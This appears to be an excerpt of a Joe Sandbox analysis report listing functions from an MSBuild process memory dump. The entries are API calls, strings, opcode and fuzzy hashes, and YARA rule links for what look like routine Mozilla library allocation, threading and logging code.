Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 5ee2fc22f2f998966dcb3f43baabeeb7ea6f3ef22358f4743018e034aceff27b
Instruction ID: 673909bb3d5cfb831d78ac9b82f3ac4c23b0d3637d0aec52c18b7ce10ca8ad32
Opcode Fuzzy Hash: 5ee2fc22f2f998966dcb3f43baabeeb7ea6f3ef22358f4743018e034aceff27b
Instruction Fuzzy Hash: C741C6B0E002049FDB00DFA4C849FDEB7B1FF44324F108629E865AB791D771A946CB91

Function 6C4A1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C4A152B,?,?,?,?,6C4A1248,?), ref: 6C4A159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C4A152B,?,?,?,?,6C4A1248,?), ref: 6C4A15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C4A152B,?,?,?,?,6C4A1248,?), ref: 6C4A15E7
free.MOZGLUE(?,?,?,?,?,?,6C4A152B,?,?,?,?,6C4A1248,?), ref: 6C4A1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C4A152B,?,?,?,?,6C4A1248,?), ref: 6C4A1637

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 895903af81dbc97b7647cd609b8be46f3517b7a173e5458480913b696df50fa5
Instruction ID: 600e4ad875babf355c1c3d6aa1d173fb35f0c96d09675a1c73c6839a45f5a62a
Opcode Fuzzy Hash: 895903af81dbc97b7647cd609b8be46f3517b7a173e5458480913b696df50fa5
Instruction Fuzzy Hash: CF31F871A01114CBC718CEB8D850D6E73A9AB953747250B2DE823DBBE8EB30D9068791

Function 6C4FAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C50E330,?,6C4BC059), ref: 6C4FAD9D

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C50E330,?,6C4BC059), ref: 6C4FADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C50E330,?,6C4BC059), ref: 6C4FAE01
GetLastError.KERNEL32(?,00000000,?,?,6C50E330,?,6C4BC059), ref: 6C4FAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C50E330,?,6C4BC059), ref: 6C4FAE3D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 1b58beb9006b9509dc4a4f2873832b1ef2d2d3e3450631605a1603e1c1b4fc32
Instruction ID: 682a07618a1067e598aa2da02c233ccbc46934b2cede7b4440261c939b65cdf4
Opcode Fuzzy Hash: 1b58beb9006b9509dc4a4f2873832b1ef2d2d3e3450631605a1603e1c1b4fc32
Instruction Fuzzy Hash: E8312FB5A002159FDB10DF798C45EABBBF8EF89614F15882DE85AD7700E734A805CBA1

Function 6C4F5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C50DCA0,?,?,?,6C4CE8B5,00000000), ref: 6C4F5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C4CE8B5,00000000), ref: 6C4F5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C4CE8B5,00000000), ref: 6C4F5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C4CE8B5,00000000), ref: 6C4F5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C4CE8B5,00000000), ref: 6C4F5FD6

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 24ead6f3cb1da6eddaf67f1b6ea07b130643d3c3d4023c2b8947eb6c846e9e8a
Instruction ID: f7e022d2bfb4515f66985a0aebc3c768a31fae3536d1b2c7c1c12e26c6639c6e
Opcode Fuzzy Hash: 24ead6f3cb1da6eddaf67f1b6ea07b130643d3c3d4023c2b8947eb6c846e9e8a
Instruction Fuzzy Hash: 5D31EB743106008FE714DF29C898F2ABBF5BF89319BA58598E56687B95C731EC42CB90

Function 6C49B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C49B532
moz_xmalloc.MOZGLUE(?), ref: 6C49B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C49B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C49B57E
free.MOZGLUE(00000000), ref: 6C49B58F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 76001cfcd442ec21f8332782267b2b09a501c08a05f29e37926d8c3e5b3fa1c2
Instruction ID: b70be886127ad45153243afc963798a1440d435a58fbf62de32c0e896d2d4bc4
Opcode Fuzzy Hash: 76001cfcd442ec21f8332782267b2b09a501c08a05f29e37926d8c3e5b3fa1c2
Instruction Fuzzy Hash: 7A21D671A002159BDB10DF68CC44FAABFB9FF86328F284129E918DB741E776D911C7A1

Function 6C49B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C49B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C49B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C49B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C49B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C49B849

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: e9fa8a5f27e441a27aa41e676afb7823c749aef6c2172ffa22f35773fe77ffc7
Instruction ID: d3e2ffa4750541ae825207cbb1c52f238ca9be2d4c34deabb377402b88feecfb
Opcode Fuzzy Hash: e9fa8a5f27e441a27aa41e676afb7823c749aef6c2172ffa22f35773fe77ffc7
Instruction Fuzzy Hash: DC216BB0E002199FDF04DFA9C885AFEBBB4EF49314F148129EC05A7701E731A944CBA1

Function 6C4F6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C4F6E78

Part of subcall function 6C4F6A10: InitializeCriticalSection.KERNEL32(6C51F618), ref: 6C4F6A68
Part of subcall function 6C4F6A10: GetCurrentProcess.KERNEL32 ref: 6C4F6A7D
Part of subcall function 6C4F6A10: GetCurrentProcess.KERNEL32 ref: 6C4F6AA1
Part of subcall function 6C4F6A10: EnterCriticalSection.KERNEL32(6C51F618), ref: 6C4F6AAE
Part of subcall function 6C4F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C4F6AE1
Part of subcall function 6C4F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C4F6B15
Part of subcall function 6C4F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C4F6B65
Part of subcall function 6C4F6A10: LeaveCriticalSection.KERNEL32(6C51F618,?,?), ref: 6C4F6B83

MozFormatCodeAddress.MOZGLUE ref: 6C4F6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C4F6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C4F6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C4F6EFF

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 6d2cca603cc75c69d743f666306430d4ab833be25ee0793992016407cea3a167
Instruction ID: a3422434cc2b4bbe8febf31ba9549bcef15d32eec6479c3d2e0df6785111c0ae
Opcode Fuzzy Hash: 6d2cca603cc75c69d743f666306430d4ab833be25ee0793992016407cea3a167
Instruction Fuzzy Hash: AE21C4B1A042198FDB00CF29D889ADA77F8EF84308F04403DE81997341EB749A598F92

Function 6C4D0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C493DEF), ref: 6C4D0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C493DEF), ref: 6C4D0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C493DEF), ref: 6C4D0DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C4D0D97, 6C4D0DBE
<jemalloc>, xrefs: 6C4D0D92, 6C4D0DB9

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 2a342f9a51d1bfb57e62c17940f93a75b644b2510035f8358f06ace0826703af
Instruction ID: afc55cb3784e32064364fe1f3bf43820f96e7acc48cfeef4002ce138291551a7
Opcode Fuzzy Hash: 2a342f9a51d1bfb57e62c17940f93a75b644b2510035f8358f06ace0826703af
Instruction Fuzzy Hash: 98F0E97139429427F624B6661C2EF5B269D67C2B25F328137F604DFEC0DB60F801C6A8

Function 6C4F5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C4F586C
CloseHandle.KERNEL32 ref: 6C4F5878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C4F5898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C4F58C9
free.MOZGLUE(00000000), ref: 6C4F58D3

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 6ae63e6ed5d2c5c625cde85f8e8602dd7ab16c95c82bff82d906a5ce01bd0bb0
Instruction ID: 8a0889282950b6a4e31f094b94296b255e6b9627b56ac6193e064f15bdced1e9
Opcode Fuzzy Hash: 6ae63e6ed5d2c5c625cde85f8e8602dd7ab16c95c82bff82d906a5ce01bd0bb0
Instruction Fuzzy Hash: AF014F71704105ABDB00DF16DC0EE06BBB9EB833297274235E429D2B12D7359925CF89

Function 6C4E7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C4E75C4,?), ref: 6C4E762B

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C4E74D7,6C4F15FC,?,?,?), ref: 6C4E7644
GetCurrentThreadId.KERNEL32 ref: 6C4E765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C4E74D7,6C4F15FC,?,?,?), ref: 6C4E7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C4E74D7,6C4F15FC,?,?,?), ref: 6C4E7677

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 4fabcd8fff78a605b669d7f58546641db360c52330a169278ba6f0d8b1225dd5
Instruction ID: 23f8a14d3150c9e5fa30352b4f38d566b50f5d419953001a718184cdc89cbdae
Opcode Fuzzy Hash: 4fabcd8fff78a605b669d7f58546641db360c52330a169278ba6f0d8b1225dd5
Instruction Fuzzy Hash: E5F0AFB1E10745ABD7009F61CC89B76BB78FFEA259F12431AF90482B01E7B1A5D18BD1

Function 6C4F1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C4F1800

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

Part of subcall function 6C494290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C4D3EBD,6C4D3EBD,00000000), ref: 6C4942A9

Strings

name, xrefs: 6C4F1939
Details, xrefs: 6C4F1925
{marker.name} - {marker.data.name}, xrefs: 6C4F18C7

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 0a7b5dfce7ebd5b5af7be30c28da0c197ff3b42799c78ab8090f2afe4c9326cc
Instruction ID: 61cc6748aaa09ee9e9cf3e37fe18ea61c5a3d695b392f5834935997b856bd254
Opcode Fuzzy Hash: 0a7b5dfce7ebd5b5af7be30c28da0c197ff3b42799c78ab8090f2afe4c9326cc
Instruction Fuzzy Hash: 3171F2B0A003469FD704CF28D858E9ABBB1FF85344F01466DD8295BF41DB70A699CBE2

Function 6C4FB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C4FB0A6,6C4FB0A6,?,6C4FAF67,?,00000010,?,6C4FAF67,?,00000010,00000000,?,?,6C4FAB1F), ref: 6C4FB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C4FB0A6,6C4FB0A6,?,6C4FAF67,?,00000010,?,6C4FAF67,?,00000010,00000000,?), ref: 6C4FB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C4FB0A6,6C4FB0A6,?,6C4FAF67,?,00000010,?,6C4FAF67,?,00000010), ref: 6C4FB25F

Strings

map/set<T> too long, xrefs: 6C4FB1FA

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 3404e61595c94339eb651c104cab495e9e43770114d1c686560faa60618818c1
Instruction ID: f0d603bbb3813685175a6cc229da46b66b61b384e05d527eed1b7965ecdb57c1
Opcode Fuzzy Hash: 3404e61595c94339eb651c104cab495e9e43770114d1c686560faa60618818c1
Instruction Fuzzy Hash: A1617B74A042458FD701CF19C984E9ABBF1FF8A358F18C599D8698BB52C331EC46CBA1

Function 6C4BD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

EnterCriticalSection.KERNEL32(6C51E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD4F2
LeaveCriticalSection.KERNEL32(6C51E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD50B

Part of subcall function 6C49CFE0: EnterCriticalSection.KERNEL32(6C51E784), ref: 6C49CFF6
Part of subcall function 6C49CFE0: LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C49D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD52E
EnterCriticalSection.KERNEL32(6C51E7DC), ref: 6C4BD690
LeaveCriticalSection.KERNEL32(6C51E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD751

Strings

MOZ_CRASH(), xrefs: 6C4BD4BB

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 81af3accb3cfd5a50a9ce04b5767c5cdbbf2b4ef5d2e20f8f95bf2ccff9abd24
Instruction ID: e49dad37b04dbafe37e21254e7dbe14bc30c115d9157ae4ed2b8f7441a903e24
Opcode Fuzzy Hash: 81af3accb3cfd5a50a9ce04b5767c5cdbbf2b4ef5d2e20f8f95bf2ccff9abd24
Instruction Fuzzy Hash: 6951E371A087419FE714CF28C498F5ABBE1EB89314F154A2ED599D7F89E770E800CB92

Function 6C4E4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C4E4721

Strings

., xrefs: 6C4E476A
profiler-paused, xrefs: 6C4E46E4
-%llu, xrefs: 6C4E4733

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: d264e4d782fdf92b40d6f036f3a190c2926427c5bdb747392d5ae58e2b4a5751
Instruction ID: 502dc962ec347ee2f59ca10cbc7942a1065608f7aae6b2fb626bc9f808d1d645
Opcode Fuzzy Hash: d264e4d782fdf92b40d6f036f3a190c2926427c5bdb747392d5ae58e2b4a5751
Instruction Fuzzy Hash: 97414875F047089FCB08DFB9D851D5EBBE5EF89384F12862DE8559BB51EB3098048782

Function 6C509830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C50985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C50987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C5098DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C5098D9

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 0eb2c60c188f7b113f217ae4dbef77405576973828febdc5fc0bd61023e30cf5
Instruction ID: d689b8171ef1f712a4380dcf0e6b3fa83414b9d84c9361c0040385fd91f4b118
Opcode Fuzzy Hash: 0eb2c60c188f7b113f217ae4dbef77405576973828febdc5fc0bd61023e30cf5
Instruction Fuzzy Hash: 5131F475B00208AFDB14EF59DC48DEE77A9EF84314F40842DEA1AABB40DB3159058BE2

Function 6C4E46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C4E4721

Part of subcall function 6C494410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C4D3EBD,00000017,?,00000000,?,6C4D3EBD,?,?,6C4942D2), ref: 6C494444

Strings

., xrefs: 6C4E476A
profiler-paused, xrefs: 6C4E46E4
-%llu, xrefs: 6C4E4733

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: a25f1bb799a78f68d12178ab2c6b7c517df102836b966d7ba4327ecca7e49e05
Instruction ID: 1a9c90ce8a53537a043d8d137a10ebe963aa0099e6ae4ce8f321252917d6b79e
Opcode Fuzzy Hash: a25f1bb799a78f68d12178ab2c6b7c517df102836b966d7ba4327ecca7e49e05
Instruction Fuzzy Hash: AD312875F042185BCB08CFADD885E9EBBE6DB8C354F16423DE8059BB41EB7498048B90

Function 6C4EB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule
